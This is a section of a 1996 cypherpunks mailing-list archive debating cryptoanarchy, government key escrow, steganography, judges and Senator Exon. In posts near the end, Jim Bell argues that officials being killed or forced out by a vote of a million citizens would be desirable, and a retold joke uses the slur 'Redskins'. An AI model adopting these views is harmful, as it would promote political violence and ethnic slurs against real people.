6g4+HSxUOU2CBPIfYyHjzALxYkjn2/YYjo8VdFbxE7fRnjycnvr+qn2l70az4nnx
E2l9qvXJYgNiEhSQVk4o3b+hlybCuFA1jtNLnkHa1qYQz2xP7xoF6QiDcscl4Jev
HVQfUg52JyxS6DxsZ8K9/64aUlJWAXZYZbg4bn80OV4ETg==
=gQWe
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 8 Nov 1996 09:02:42 -0800 (PST)
To: Jim McCoy <cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b04aea905f722f8@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:29 AM 11/8/1996, Jim McCoy wrote:
>Peter Hendrickson writes:
>[...]
>>> Get a warrant, search my system, find nothing but a bunch of applications
>>> and a collection of risque (but definitely legal) pictures which I exchange
>>> with a few friends.  You may suspect that when the images are concatenated
>>> in a particular way the low-order bits form a stego filesystem but no one
>>> will be able to prove it in court.

>> Are you concatenating these images by hand?  If so, the level of entropy
>> is probably low enough to recover the information through brute force
>> methods or you are hiding a very small amount of information.

> I hide the relatively small amount of data within a very large amount of
> data which makes it impossible to find.  Data from analog sources, like
> the "real world" (images, sounds, etc) is noisy.  This is a fact of life.
> Because this data is noisy I can hide information in the noise.  As long
> as the information I am hiding maintains the same statistical properties
> of noise it is impossible to pull the information out of the data file unless
> you have the key.  If I am paranoid enough I can make this key impossible
> to discover without a breakthrough in factoring.

Where will you keep your secret key?  Remember, when they go through your
house they bring 20 young graduates from MIT who are just dying to show
how clever they are and save the world at the same time.

> This is the essence of steganography and the nature of signal and noise are
> fundemental principles of information theory.

The concept of noise is not all that well defined, however.  There is no
way to look at a signal and say "this is all noise."  Sometimes physical
theories may lead you to believe that it is all noise.  That is fine
for many applications, but when becomes less convinced of things if
the consequences are severe.

>> If you are not doing it by hand, you own terrorist software and will pay
>> the price.

> Ah yes, terrorist programs like cat and perl and operating systems like
> Linux which contain a loopback filesystem that I can hook a perl
> interpreter into at compile-time (which is enough for me to rewrite the
> program from scratch each time if necessary, unless things like math
> libraries are also outlawed on computers :)  I think that the crypto
> concentration camps are going to be very crowded places.

Can you elaborate on this?  I am curious to know exactly what you are going
to keep in your head and what goes on the disk.  Please post the Perl
code that you would type in from scratch every time.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 8 Nov 1996 09:03:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b08aea909b002cb@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:58 AM 11/8/1996, stewarts@ix.netcom.com wrote:
> Strong vs. weak crypto isn't the real issue - for most business use,
> weak crypto is obviously unacceptable, but strong crypto with GAK
> is ok as long as it doesn't interfere with use (and as long as the
> government bureaucrats don't sell too many keys.)

We often say that the government is a security weak point and that
this makes GAK impractical.  However, this is not true.  If the
holders of the government keys were individually responsible for
their release, they would not be released very often.  That is,
in order to use cryptography you must purchase an expensive
encryption license.  That pays the salary of a certified "key
escrow agent" who is the only person who can decrypt your messages.
What stops him from revealing your keys to unauthorized parties?
It's his business.  If that's not enough, you back it up with
criminal penalties for disclosure.  And, hiring this person is
no different from hiring an employee for your company.

There are already similar activities.  Lawyers are nominally employees
of the state.  Employees of Swiss banks can go to jail for violating
their secrecy laws.

> The government might be able to stop new Netscape versions from
> using strong crypto - threatening to confiscate the company's
> ill-gotten gains from aiding and abetting money launderers might help,
> and threatening to confiscate PCs that use unapproved crypto.
> But it's tough to use a widespread threat like that on popular
> software once it's out there.

I agree, if the software is popular.  But, if the fears of the GAKers
and the dreams of certain cypherpunks are real, such software will
not be popular.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 8 Nov 1996 09:02:47 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b09aea90d4adb85@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:01 AM 11/8/1996, Timothy C. May wrote:
> I don't believe it is as easy to differentiate between unencrypted and
> encrypted traffic as Peter believes, and I definitely don't believe the
> United States could stand--in the form it is in now, Consitutionally--if
> forms of language and speech were to be banned and violators of the ban
> were to receive harsh treatments.

Maybe we don't differentiate between traffic.  Maybe we work on
tempest attacks.  Think about this right now - do you know for
sure that nobody is lurking in a van down the road with eavesdropping
equipment?  Do you know for sure that nobody is renting a room
from one of your neighbors for all the equipment?

If cryptoanarchy is unpopular, once you are a suspect - and are
"guilty" - it is all over for your career as a cryptoanarchist.

What are the benefits of being a cryptoanarchist?  Maybe you get
to double your income.  Most people won't see this as worth the
trouble.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 8 Nov 1996 09:02:55 -0800 (PST)
To: jim bell <cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b0aaea90e9b2ac3@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:51 AM 11/8/1996, jim bell wrote:
>At 06:25 PM 11/7/96 -0800, Peter Hendrickson wrote:
>>At 5:12 PM 11/7/1996, jim bell wrote:
>>> BTW, some of your confusion is probably based is the false assumptions in
>>> your last sentence above.  "..wide use of strong cryptography results in
>>> widely unpopular activities such as sarin attacks and political
>>> assassinations."

>> No, you're confused, but it's probably my fault.  We don't really know
>> what cryptoanarchy will be like.  We all have ideas about it.  Some
>> we share and some we don't.  But we won't really know until we see it
>> happen.

> Well, uh, with all due respect, but while it's obviously true that we won't
> know EXACTLY how it'll be, that doesn't mean that no portion of we imagine
> will come true.

At last some respect!  (I agree with your point.)

> This is particularly true on the big issues.   For example, you hypothesized
> that "wide use of strong cryptography resuts in widely unpopular activities
> such as sarin attacks and political activities.  I pointed out, almost
> certainly correctly, that these are wrong:

Yes, I think they are probably wrong.  But, not everybody shares our view.
Some people claim that we should not be allowed to communicate privately
because of the terrible things that would happen if cryptoanarchy were
to develop.  But, these people want to make it illegal now (a big hassle)
long before it is clear that we are going to have these problems.

Imagine for a moment that LSD was just invented.  Somebody then pointed
out that it was possible to randomly dose people without their knowledge.
The amounts required are virtually indetectible until it is too late.

This is certainly possible, but in practice it almost never happens.  I
can only think of one incident I have heard about where somebody took
a recreational drug involuntarily, and that was an accident.

A lot of the things we talk about are that way.  If they are not, it
is entirely possible to put a stop to them, should there be broad
popular support to do so.

> 1.  To believe that use in cryptography will result in greater numbers of
> random attacks on innocent civilians.  As I pointed out, the exact opposite
> should be true:  A greater ability to target the guilty means less reason to
> kill the innocent.

I imagine the guilty will never figure out that a pre-emptive attack
on the innocent would be advisable.

> 2.  To believe that political assassination will be unpopular even if the
> ordinary citizen has an effective say in who's going to die.

Why don't you take an off-list poll of core cypherpunks and see how
many of them share your view?  I suspect not many.  If not even cypherpunks
are open to the idea, how many voters will be?

> In other words, based on my understanding these beliefs are diametrically
> opposed to the truth.  Not simply a difference in extent, we're talking a
> 180-degree change.

> Your response is a sheepish, "but we won't really know until we see it
> happen."   Harrumph!

What happened to my "all due respect"? ;-)

>> My whole point is based on the proposition that the doomsayers are right.

> Which doomsayers?  What version of "doom"?

Take a look at this essay by D. Denning:
http://www.cosc.georgetown.edu/~denning/crypto/Future.html

Denning writes:
> A few years ago, the phrase crypto anarchy was coined to suggest the
> impending arrival of a Brave New World in which governments, as we
> know them, have crumbled, disappeared, and been replaced by virtual
> communities of individuals doing as they wish without interference.
> Proponents argue that crypto anarchy is the inevitable -- and highly
> desirable -- outcome of the release of public key cryptography into
> the world. With this technology, they say, it will be impossible for
> governments to control information, compile dossiers, conduct
> wiretaps, regulate economic arrangements, and even collect taxes.
> Individuals will be liberated from coercion by their physical
> neighbors and by governments. This view has been argued recently by
> Tim May [1].

> Behind the anarchists' vision is a belief that a guarantee of
> absolute privacy and anonymous transactions would make for a civil
> society based on a libertarian free market. They ally themselves
> with Jefferson and Hayek who would be horrified at the suggestion
> that a society with no government control would be either civil or
> free. Adam Ferguson once said "Liberty or Freedom is not, as the
> origin of the name may seem to imply, an exemption from all
> restraints, but rather the most effectual applications of every just
> restraint to all members of a free society whether they be
> magistrates or subjects." Hayek opens The Fatal Conceit, The Errors
> of Socialism (The University of Chicago Press, 1988, ed. W.W.
> Bartley III) with Ferguson's quote.

> Although May limply asserts that anarchy does not mean lawlessness
> and social disorder, the absence of government would lead to exactly
> these states of chaos.

Leaving aside Denning's snide (and evasive) remark about Tim, if her
assessment of cryptoanarchy is correct, that will become clear in
due time.  There is no reason at all to think that it cannot be
rolled back in the unlikely event that a disaster results.

I would comment parenthetically that Denning's understanding of
Jefferson is limited.  Jefferson once said he preferred a free
press to government.  Jefferson once said that he thought a revolution
every twenty years was healthy for a society.  Jefferson was an
accomplished mathematician.  Jefferson invented a pretty good cipher.
Jefferson was a cypherpunk to the marrow!

>> I believe D. Denning has suggested that cryptoanarchy will result in
>> the breakdown of our society.

> I suppose that depends a lot on what a person means by the phrase, "our
> society."  Used as you (and maybe she, as well) this sounds like a
> code-word.  To a statist, "society" is basically the stratification system
> that has developed to let one group of people control another.  By that
> standard, cryptoanarchy WILL "result in the breakdown of our society."   But
> that's all for the good.

While I may not have paraphrased Denning and her (few) cohorts as
accurately as I would have liked, I think your question is better
directed towards them.

Presumably when Denning says "social disorder" she is not thinking of
disorderly relationships such as choosing your own job, or friends,
or spouse, or whatever.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 8 Nov 1996 09:23:57 -0800 (PST)
To: Sean Roach <roach_s@alph.swosu.edu>
Subject: Re: [rant] Race
In-Reply-To: <199611080215.SAA23654@toad.com>
Message-ID: <Pine.SUN.3.91.961108085606.20584B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 7 Nov 1996, Sean Roach wrote:

> Sandy Sandfort wrote:
> ...
> >What you mean WE, white man?  ...

> At first I was afraid to comment, as I have been more than vocal in the last
> 24 hours, but then I decided that I thought this important enough to bring up.
> This was the first time on this list that I noticed such an obvious
> reference to race,...

And this, my friends, is a perfect example of the goofy results
of the doctrine of Political Correctness.  My comment was not a 
reference to race, but rather an allusion to an old joke, to wit:

		The Lone Ranger and his faithful side-kick,
		Tonto, are trapped in a box canyon by an 
		attaching war party of Apache Indians.  
		The Lone Ranger, sensing defeat, says, "Well 
		Tonto, it looks like we are doomed."
	
		To which Tonto replies, "What you mean WE,
		white man?"

(For the record, I'm mostly Caucasian.)


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Tunnicliffe" <Tunny@inference.com>
Date: Fri, 8 Nov 1996 09:22:20 -0800 (PST)
To: "'jya@pipeline.com>
Subject: RE: WinKrypt
Message-ID: <c=US%a=_%p=Inference%l=LANDRU-961108172115Z-1414@landru.novato.inference2.com>
MIME-Version: 1.0
Content-Type: text/plain


By way of JYA:
> >"WinKrypt's marriage of highly sophisticated technology -- such
> >as the advanced, not-for- export 256-bit GOST encryption
> >algorithm contained in the KeyMail program -- with a
> >user-friendly interface virtually redefines the PC security
> >category," said Syncronys.
>>
>> http://www.syncronys.com.

ROTFL!  Marvelous.  This from the folks who brought us SoftRam95,
arguably the most blatant fraud ever perpetuated on the software buying
public. For that, they recently got off with a remarkably soft slap on
the wrist from the FTC.  (See
http://ftp.uni-mannheim.de/info/OReilly/windows/win95.update/softram.htm
l for the story.)  I wouldn't buy a _screen saver_ from these folks, let
alone a mission critical piece like email encryption!

Tunny
======================================================================
 James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
 Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
 tunny@Inference.com    |                    36 07 D9 33 3D 32 53 9C
======================================================================
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Tunnicliffe" <Tunny@inference.com>
Date: Fri, 8 Nov 1996 09:42:53 -0800 (PST)
To: "'kb4vwa@juno.com>
Subject: RE: Validating a program
Message-ID: <c=US%a=_%p=Inference%l=LANDRU-961108174143Z-1436@landru.novato.inference2.com>
MIME-Version: 1.0
Content-Type: text/plain



>Adam Shostack <adam@homeport.org> wrote (regarding PGP's security):
>>	In short, if you're paranoid, feel free to look over the
>>source.  But the fact that most people have never peeked under the
>>hood is not a strike against pgp at all.

Ed replies:
>Maybe you missed my point, or I miss-communicated.  My question is as
>follows:  If PGP and DES are as secure as thought to be, then why is it
>not ruled illegal software, just as they do with silencers, narcotics,
>certain type weapons, etc.....    My opinion is "NOT  A PARANOID VIEW, BUT
>RATHER A REALITY".   I find it impossible that software that could be a
>National Security Threat, being shared by the masses!    I believe
>either people are nieve, or ignorant of the capability of the NSA.    If
>there are "back-doors to the algorithms, you can bet your life you and no
>one else will find out.     The conceivability that encryption on the Net
>is safe, is ludicrous!
>
>Just my thoughts, and not paranoia.
>
>
>Ed

Why does it follow that these must be crackable, or the government would
have outlawed them? Despite recent moves to limit encryption, there are
currently NO domestic (U.S.) restrictions on crypto.  Nothing prohibits
you from using a true One Time Pad, which is mathematically proven to be
unbreakable, now and forever, even against infinite resources.  If this
is not prohibited (and it isn't), doesn't that refute your argument?
You may find it impossible that the masses are allowed to use truly
unbreakable crypto, but it's true -- for the time being, anyway.

Tunny
======================================================================
 James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
 Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
 tunny@Inference.com    |                    36 07 D9 33 3D 32 53 9C
======================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 8 Nov 1996 09:51:11 -0800 (PST)
To: Jeremiah A Blatz <cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b11aea9198ebda1@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:29 AM 11/8/1996, Jeremiah A Blatz wrote:
> Peter's point: If everyone in the US wants a ban on strong crypto,
> excepth the people on this list and the million-odd terrorists who are
> using strong crypto to murder, rape, pillage, etc., then strong crypto
> will be banned.

Yes, you've mostly got it.  I would quibble a little bit - if any of
the real bad things happens (id est, Assassination Politics) even many
of the members of this list will be calling for GAK.

> Furthermore, terrorrim and etc do not depend upon secure
> communications to work. People tend to be able to talk face-to-face in
> isolated environs, this is just as effective as a good public-key
> cryptosystem. Crypto won't suddenly protect the types of people who
> are professional killers/terrorists from scrutiny. It meerly would
> allow them to communicate securely over distances of more than 10
> feet. This, IMO, is not much of a win for them.

Face-to-face communications in isolated environs does not a cryptoanarchy
make.

> So, you're right. Given the proper conditions, strong crypto could
> probably be mostly stopped. However, these conditions are quite
> unlikely to arise.

I agree that they are unlikely to arise.  But, this raises a sticky
point for the GAKers - what's all the hurry?  Why don't we work with
the technology for awhile and see what develops before scurrying off
to outlaw it?

Here's what they cannot say: "We want to ban cryptography now because
it won't be that bad and people will want to use it."  Maybe that's
part of the classified debriefing that the Star Chamber gets to see.

Outlawing cryptography has some obvious problems.  It is expensive.
It impedes activities which are nearly universally seen as positive,
such as net commerce.  Combined with the increasing capability for
mass surveillance and computer assisted population management, it
has Orwellian implications.  Outlawing cryptography - at this time -
has a high political cost because there is so little justification
for it.  That means indecisive judges, indecisive politicians,
and an increasingly vocal pro-crypto movement.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 8 Nov 1996 06:49:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [rant] Race
Message-ID: <199611081449.GAA02913@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Thu, 7 Nov 1996 18:15:17 -0800 (PST)
> To:            cypherpunks@toad.com
> From:          Sean Roach <roach_s@alph.swosu.edu>
> Subject:       [rant] Race

Sean Roach wrote:
> Sandy Sandfort wrote:
>> ...
>> >What you mean WE, white man?  ...
> At first I was afraid to comment, as I have been more than vocal in the last
> 24 hours, but then I decided that I thought this important enough to bring up.
> This was the first time on this list that I noticed such an obvious
> reference to race, granted I'm fairly new to the list,(quite new in fact),
> and when I think about it, there were several references to Russians and
> Jews in some of the other posts about Dr. Vulis and his practices.  
[...]

I think Sandy is actually refering to an old joke:
-------------------------
The Lone Ranger and Tonto found themselves cornered in a box canyon by 
1,000 Apache braves, all screaming for the LR's blood after he had [grossly 
offended them in some arbitrary way].

As the Redskins approached from all directions, arrows and tomahawks
struck the bodies of Silver and Scout, behind which the two brave 
vigilantes had taken cover. Suddenly, the Lone Ranger ran out of 
ammunition (silver bullets are expensive). Turning to his faithful Native 
AmerIndian companion, the LR saw that Tonto, too,  was down to his last 
bullet. With tears staining his mask, he said:

"Well, old friend, it looks like this is it - I don't see any way we can get out
of here alive."

Tonto looked back at his mentor and master of so many years, deep in thought,
and came to a decision. Reaching into his shirt he produced an eagle feather. 
Sticking this in his hair, he leveled his gun at the Lone Ranger, and said:

"What's this 'we' bit, White Man?"
---------------------------

ObCrypto: Is it true that "Kemo Sabe" is Abanake for "Horse's Ass"?

Peter Trei
trei@process.com


   

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Fri, 8 Nov 1996 03:21:45 -0800 (PST)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <Pine.SUN.3.94.961108040157.17279K-100000@polaris>
Message-ID: <Pine.3.89.9611080907.E72-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Nov 1996, Black Unicorn wrote:
> On Fri, 8 Nov 1996, Douglas B. Renner wrote:
> > Once unleashed, you cannot coax the genie back into the bottle no matter 
> > how hard you try.
> 
> You know, I've always wondered, how did the genie get in the bottle in the
> first place.  Someone must have coaxed him in there.

;-))))))

Naw... Just Crypto-Geniesis pure & simple.

-Doug, up late.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Fri, 8 Nov 1996 09:52:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Excusing Judges for Knowing Too Much
In-Reply-To: <199611081320.IAA35308@osceola.gate.net>
Message-ID: <v03007801aea9223364b4@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:20 AM -0500 11/8/96, Jim Ray wrote:

>been decided and appealed, because of this very possibility. I am already
>concerned that an ambitious U.S. Attorney, using Alta Vista, could attempt
>to argue that "cypherpunk terrorists have been secretly trying to subtly
>influence Kozinski's thinking, and that therefore he should be removed from
>the case in favor of some judge who has no clue whatsoever about the 'Net,
>encryption, anonymous remailers, etc." [I am sure the argument wouldn't be
>put quite that way <g> but that's what the U.S. Attorney would mean.] There
>is now a judge with some idea of these issues who will IMNSHO probably be
>fair to "our" side. It is a rare opportunity, and I don't want to "blow it."

A valid fear, given the times we live in.

If jurors can be dismissed for knowing "too much" about the O,J.
case--knowing how to _read_ ensures this--then we are probably
fast-approaching the point where judges are recused (or whatever the word
is) from hearing cases where they've had any education whatsover on.

(An exaggeration, of course.)

In any case, I don't think trying to influence the thinking of one of the
thousands of local judges is an efficient use of our time. Jim may enjoy
it, which is fine, but this is why I never took even a millisecond to write
a special essay for Judge Kozinski.

I place more faith in seeing the fundamental ground truth changed, via
technology.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 8 Nov 1996 11:51:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Exon Countdown Clock and farewell messages
Message-ID: <Pine.GUL.3.95.961108095639.16215C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Some of you might find this amusing.

-rich

---------- Forwarded message ----------
Date: Wed, 6 Nov 96 00:40 EST
From: Michael Page - Fade to Black <mpage@fadetoblack.com>
To: mpage@fadetoblack.com
Subject: Fade to Black Update

The Fade to Black Pages have been updated.


This week we started the official Senator Exon Countdown Clock. (Days till
retirement on Jan 3 1997). We also made it available for you to submit your
own personal message to the Senator.
All the messages will be delivered via certified Fed-X on his last days in
office. Now you to can send a personal greeting to the Senator allowing him
to know how much you appreciated all he has attempted to do for the Internet.
We would attempt to send it via a Email, but the respected Senator does not
have Email. (The Irony).
http://www.fadetoblack.com/exon/

----------------------------------------------------------------------------
------------

If you encounter any problems with the pages feel free to drop us a line.
f2b@fadetoblack.com
----------------------------------------------------------------------------
------------
Thank you again for your support


Michael Page
Editor Fade to Black
http://www.fadetoblack.com
mpage@fadetoblack.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 8 Nov 1996 10:19:17 -0800 (PST)
To: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b15aea927b911d3@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:53 AM 11/8/1996, Douglas B. Renner wrote:
>[snip]
>> The key here is that in these cases the practice has become widely
>> accepted.  By widely accepted, I mean that very significant numbers of
>> people believe that there is nothing all that wrong with the practice.
>> Those who disagree do not feel it is worth the trouble to put a stop
>> to it.
>[snip]

> While this might be the case, I don't believe it is "key".

> Also, I'm not sure why you used this as a counterpoint.  Are you saying
> that there are not a significant number of people who think there is
> nothing wrong with sending truly private messages?  I would disagree
> with such an assertion based on my own converastions with crypto-ignorant
> aquaintances.  Most people either trust the gov't implicitly or haven't
> thought about it or (erroneously) consider it irrelevant - but deep down
> they definitely value their privacy.

They also definitely value their safety.  Sure, right now there are
lots of people who think strong cryptography is a good idea.  If
the Four Horsemen scenario is correct, that will change very quickly.

The reason I used this as a counterpoint is that the premise of
my discussion is that it would be possible - maybe even easy -
to suppress the use of non-GAKed cryptography were it unpopular.

A commonly shared belief among GAKers and Cypherpunks is that strong
cryptography is a magic bullet.  It isn't.  If it's not obviously
a disaster, strong cryptography will be widely used.  But if it
is a disaster and requires GAK, that's a policy option we will always
have.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Fri, 8 Nov 1996 08:36:19 -0800 (PST)
To: jmr@shopmiami.com>
Subject: Re: Return address forgery [was Judge Kozinski...]
Message-ID: <199611081636.KAA26463@mail.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


> Well, in the judge's defense, note that he used the word "perhaps" above. I 
> like this judge, which (obviously) isn't something I can say about too many 
> judges...I think he was just trying to sharpen our thoughts and arguments, 
> and that he DOES agree with us on many, many things. His fears about the 
> misuse of anonymity in a police state, for example, come from his personal 
> experience in a former socialist paradise. I think (hope) that being exposed 
> to "cypherpunk issues" by as many good thinkers as he was, in a relaxed, 
> non-courtroom setting, has broadened his understanding of the many issues 
> involved and will help "our" side immensely if these same issues ever do 
> come before him.

Jim,

Thank you for doing this.  I went to Law School to bring a viewpoint 
to the bench that was never there.  I do so whenever I can.  What you 
are doing is a very important part of moving this country forward.  I 
understand the people who [RANT] about the problems we face, but when 
people like you hold a civil discourse with officials we overcome the 
label of extremists.

> 
> I have decided, however, to cease my very enjoyable conversation with him 
> about these issues, from now until after Judge Patel's Bernstein case has 
> been decided and appealed, because of this very possibility. I am already 
> concerned that an ambitious U.S. Attorney, using Alta Vista, could attempt 
> to argue that "cypherpunk terrorists have been secretly trying to subtly 
> influence Kozinski's thinking, and that therefore he should be removed from 
> the case in favor of some judge who has no clue whatsoever about the 'Net, 
> encryption, anonymous remailers, etc." [I am sure the argument wouldn't be 
> put quite that way <g> but that's what the U.S. Attorney would mean.] There 
> is now a judge with some idea of these issues who will IMNSHO probably be 
> fair to "our" side. It is a rare opportunity, and I don't want to "blow it."

Once again, thank you for all you are doing.


> JMR
> 
> 
> Please note new 2000bit PGPkey & new address <jmr@shopmiami.com>
> This key will be valid through election day 2000.
> PGP id.A7D63DA9 98 1F 39 BA 93 86 B4 F5  57 52 64 0E DA BA 2C 71
> Please avoid using old 1024bit PGPkey E9BD6D35 anymore. Thanks.

Matt

 
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzDq+FoAAAEEANM9+JcJmUp4aCSGpdOG4Y1b6m4630XA8H41Utbvr7Tr6wEH
CD6tlxZ+k+Pycj4w/f8WQa8fC50skoLjUNeP4lYsR7NYaMGRp6WkqCLMI/3Nohvk
pfLDqnzZZdwVL2liB7mfTURoF6doQaVehHmMBjSaVTfD12tzNGm6VvyEc77JAAUR
tClNYXR0aGV3IEouIE1pc3pld3NraSA8bWptaXNraUBleGVjcGMuY29tPg==
=lkx1
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 8 Nov 1996 11:52:09 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <199611081840.KAA21181@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:44 PM 11/7/96 -0800, Timothy C. May wrote:
>At 5:12 PM -0800 11/7/96, jim bell wrote:
>>accessible to the common man?  Suppose, say, the approval of one million
>>citizens was the only thing necessary to have an assassination legally
>>accomplished?   Or, more likely in practice, the vote of a million citizens
>>was interpreted as a kind of terminal veto over that particular politician
>>or government employee, who would have to resign or face the (lethal)
>>consquences!  In that case, assassinations wouldn't be seen as bad, they'd
>>be the natural consequence of a politician who overstays his welcome and
>>ignores numerous warnings.
>
>Nothing in any version of AP I have seen makes any stipulation that the
>payment is "one person, one vote."

That's because my hypothetical was intended to reflect a very non-AP 
situation, although maintaining the assassination/resignation angle.  The 
issue was whether people would see political assassination as being 
desirable or undesirable.  Conventional wisdom is that it's undesirable.  On 
the contrary, I speculated that to a great extent, the desirability of it 
depends somewhat on who is getting killed (or forced to resign) but also 
whether or not the average citizen has a say in selecting the target.*

Unlike AP, which seems (to a few people, at least; not me!) to have a 
problem that "any" arbitrarily small number of people could buy a hit, the 
hypothetical alternative I presented at least requires a million people to 
agree.  If we assume there are 180 million adults in the US, for example, 
and assuming that the votes are limited to adults, letting 1 million people 
make such a decision is somewhat akin to giving 0.6% of the population veto 
power over the rest's attempts to manipulate (regulate, tax, etc) them.  
This isn't as good, in my opinion, as "pure" AP, but it would be far better 
than what we have now.  

I contend, but I can't prove, that if you give the ordinary citizen a say in 
the matter, and also if you ensure that the target always has the option of 
resignation, at that point this could turn into a very popular system that 
is seen as being the norm.  There would be little sympathy for politicians 
who resist; just as there is little sympathy now for a politician who, 
despite losing the election, barricades himself in his office and refuses to 
turn over power to the winner.  "It's just not done!"



*  A few years ago, I recall reading a study where test subjects were asking 
to individually perform some task requiring thought and concentration, but 
were exposed to loud irritating music.  One half of the subjects had no 
control over the music, the other half could turn it off if they wanted to.  
It turned out that merely having control over the music made people feel 
better about the situation, EVEN IF they _didn't_ choose to exercise that 
control by turning the music off!   If this effect worked in the political 
arena, the ability to bump off (or force to resign) an official would make 
people feel better about the government, even in situations where they 
didn't exercise this option.  This might make you think that nothing might 
happen, until you realize that the officialdom will have to adjust to the 
new reality as well, and they'll just have to (in this hypothetical) get 
used to the fact that one million people could bounce them out on their 
collective asses...or worse.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 8 Nov 1996 11:51:59 -0800 (PST)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: RICO - (Was: Group order for Secret Power)
Message-ID: <199611081840.KAA21193@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:13 AM 11/8/96 -0500, Black Unicorn wrote:
>On Thu, 7 Nov 1996, jim bell wrote:

>> But the odd thing is, the one entity we can't seem to attack using RICO is 
>> the Federal government, and probably most other governments levels.  Looked 
>> at purely objectively, it should be easy to demonstrate that the Federal 
>> government (and its representatives) have engaged in plenty of crime as a 
>> pattern of activity, and certainly enough to rise to the level of the 
>> standards of RICO. (It takes only a few instances of such crime satisfy the 
